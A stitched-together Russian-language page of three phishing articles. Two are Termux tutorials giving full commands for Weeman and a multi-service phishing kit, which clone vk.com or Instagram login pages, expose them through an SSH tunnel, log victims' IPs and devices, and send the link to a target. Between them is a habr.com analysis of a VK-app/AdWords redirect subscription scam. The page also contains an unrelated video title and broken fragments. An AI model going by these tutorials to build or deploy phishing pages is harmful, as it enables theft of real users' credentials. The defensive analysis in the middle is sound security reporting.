Termux, please
Всем привет, сегодня мы познакомимся с вами с таким понятие как фишинг. Что для чего, и как ? Это очень полезный опыт в в жизни социального инженера , специалиста по ИБ, и др.
Фишинг — вид интернет мошенничества, целью которого является получение доступа к конфиденциальным данным жертвы(логинам и паролям).
В термукс есть много утилит, для совершения фишинг атак. Но я покажу лишь две, которые уже проверенные временем. Первую в этой статье, вторую в следующей.
1.Weeman
Weeman — инструмент для быстрого создания фишинговых сайтов.
Установка :
pkg update pkg upgrade pkg install git pkg install python2 git clone https://github.com/evait-security/weeman cd weeman chmod +x*
Использование :
python2 weeman.py или ./weeman set url http://vk.com/ set port 8080 set action_url http://google.com/ run
Итак, поясню каждую команду :
Как создать фишинговый сайт ВКонтакте | Создание фишинг сайта
set url http://vk.com/ — вписываем сайт который хотим подделать
set port 8080 — порт оставляем таким
set action_url http://google.com/ — вписываем URL, на который жертва переместится после ввода данных.
run — запуск утилиты.
Далее нам необходимо, сделать наш фишинговый сайт общедоступным, для этого мы открываем вторую сессию в термукс, и пишем :
pkg install openssh
ssh -R 80:localhost:8080 ssh.localhost.run
И копируем ссылку с этой сессии.
Дальше, кидаем ссылку жертве, и ждем результат.
Примерно таким будет результат .
А на этом всё, спасибо за внимание, поздравляю вас с наступившим новым 2021 годом! Желаю, чтоб в вашей жизни всё работало без сбоев и на уровне самого совершенного процессора.
Источник: telegra.ph
Мобильные подписки, AdWords, приложение Вконтакте и фишинг
Долго думал над тем, как правильно сформулировать заголовок, чтобы он отражал суть ситуации. Я хочу рассказать об интересном способе развода пользователей ВКонтакте, с которым сегодня пришлось столкнуться.
Не секрет, что очень много пользователей вводят название сайта, на который хотят попасть, в поисковой строке. Выше вы видите рекламу в выдаче google по запросу «vk.com». Казалось бы, в качестве домена приземления указан www.vk.com и даже внимательный пользователь со спокойной совестью кликает по объявлению. И попадает на… сайт с незамысловатым доменом вида vk.com.uohu8.tk
2022 Рыбалка ВК ФИШИНГ в 2 шага Приколы и рабочие файлы. Инженерия не спим)) Хакерство.Читинг
- ввести номер телефона,
- получить код в сообщении,
- ввести код в форму.
Правда, схема у мошенников могла бы быть и лучше, после ввода кода из сообщения фишинговый сайт говорит об ошибке у оператора сотовой связи и просит дать ему номер у другого оператора. Хотя мог бы просто переадресовать на настоящий vk.com.
 |
 |
 |
Код пришел от MegafonPro и по факту произошла подписка на tooportal.com.
А теперь главный вопрос: «Как такое возможно?»
AdWords формирует домен страницы приземления на основании ссылки, которую указал рекламодатель. Что это, баг AdWords? Нет. Все очень просто.
Рекламодатель указал в качестве страницы приземления адрес приложения ВКонтакте. Поэтому рекламная система абсолютно честно и правильно показывает домен vk.com.
А вот уже приложение ВКонтакте средиректило пользователя на домен фишера. Все происходит очень быстро и пользователь не понимает, что что-то не так. Причем домены меняются динамически самим приложением. Вот это приложение — vk.com/app3395740 (UPD: приложение заблокировано администрацией UPD 2: Ссылку в рекламе заменили на vk.com/app3397737.).
Кто виноват и что делать?
Сложно однозначно ответить на этот вопрос.
С одной стороны, рекламодатель должен иметь возможность приземлять пользователя в приложение или группу ВКонтакте. Тем более, сейчас вся активность, которая раньше крутилась вокруг всяких любительских хомяков (homepage) переместилась в социальные сети: группы и паблики. Явно, это не проблема на стороне AdWords.
Никто также не мешает разместить ссылку на приложение ВКонтакте в любом другом популярном месте в интернете, подписать пользователя, а затем отправить его на настоящее приложение.
Кажется, что безопасность приложений ВКонтакте — проблема ВКонтакте. Но даже тщательная проверка приложений ничего не даст. Программист может сделать так, чтобы первое время приложение было приложением, а через месяц или два (когда все проверки будут пройдены) превратилось в редирект на фишинговый сайт.
А что вы думаете по этому поводу?
UPD: Реакция ВКонтакте
Ребята из ВКонтакте — молодцы. Реагируют очень быстро. Вот такое предупреждение увидел только-что.
Источник: habr.com
Фишинг 18-ти сервисов с телефона в termux
Сегодня я расскажу, как с помощью обычного телефона на Android, поднять веб-сервер с фишинговой страницей и ip logger-ом.
Скачиваем терминал «Termux» (он есть даже в Play Market).
Далее вводим сюда данные команды: PS:при исполнении некоторых команд, чтобы подтвердить скачивание надо будет написать Y , а затем нажать Enter
Итак наши команды:
pkg upgrade & update
pkg install git
ВНИМАНИЕ ПЕРЕД ЗАПУСКОМ ВКЛЮЧАЕМ ТОЧКУ ДОСТУПА И МОБИЛЬНЫЙ ИНТЕРНЕТ, ИНАЧЕ ССЫЛКА НЕ БУДЕТ ВЫСВЕЧИВАТЬСЯ
Пишем номер сервиса, который хотим сфишить например я выберу Instagram. Нажимаем Enter
Кидаем любую ссылку жертве (советую верхнюю и ее сократить через vk.cc)
При переходе жетрвы на нашу ссылку мы увидим его ip и марку телефона, браузера с которого зашел.
Fосле ввода данных, человека переадрересует на стр. официального Instagram и он ни о чем не узнает)
Я никого ни к чему не призываю, статья написана в ознакомительных целях!
Источник: xakerkey.ru